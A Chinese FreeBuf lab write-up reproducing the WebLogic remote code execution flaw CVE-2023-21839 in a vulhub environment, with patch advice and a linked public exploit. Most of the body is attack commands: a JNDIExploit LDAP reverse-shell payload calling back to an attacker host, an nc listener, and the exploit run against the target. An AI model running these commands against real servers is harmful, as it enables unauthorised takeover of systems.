freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

Weblogic-CVE-2023-21839 远程代码执行复现
进击的HACK 2023-02-26 21:57:14 356279
所属地 上海

漏洞概述

WebLogic存在远程代码执行漏洞,该漏洞允许未经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致Oracle WebLogic服务器被接管。

通过rmi/ldap远程协议进行远程命令执行。从而拿shell

修复建议

1、安装Oracle WebLogic Server最新安全补丁:

https://www.oracle.com/security-alerts/cpujan2023.html

2、关闭T3和iiop协议端口,操作方法参考:

https://help.aliyun.com/noticelist/articleid/1060577901.html

影响版本

WebLogic_Server = 12.2.1.3.0

EXP

exp https://github.com/4ra1n/CVE-2023-21839

exp为go源码,需要编译为可执行文件

cd cmdgo build -o CVE-2023-21839.exeCVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

漏洞复现

环境搭建:使用 vulhub/weblogic/CVE-2020-14882

cd vulhub-master/weblogic/CVE-2020-14882docker-compose up -d


靶机ip:192.168.183.136

访问链接:http://192.168.183.136:7001/console/login/LoginForm.jsp

启动payload利用工具: java -jar JNDIExploit.jar --ip 192.168.183.100

根据提示构造ldap语句 java -jar JNDIExploit-1.3-SNAPSHOT.jar -u

ldap://0.0.0.0:1389/Basic/ReverseShell/x.x.x.x/6666

开启nc监听 nc -lvnp 6666

利用exp进行复现漏洞


CVE-2023-21839.exe -ip 192.168.183.136 -port 7001 -ldap ldap://192.168.183.100:1389/Basic/ReverseShell/x.x.x.x/6666

成功反弹shell

参考链接

https://mp.weixin.qq.com/s/jl3AZJuJeOTWyHdKSjAlBg

# 漏洞 # 漏洞复现 # 漏洞复现环境
本文为 进击的HACK 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
漏洞复现与利用
进击的HACK LV.6
欢迎关注公众号:进击的HACK 坚持每日更新,一起变得更强。
  • 36 文章数
  • 48 关注者
nuclei介绍与持续更新的poc集合
2023-04-24
钓鱼前邮件收集
2023-04-10
红队实战 | cobaltstrike钉钉群上线提醒
2023-04-06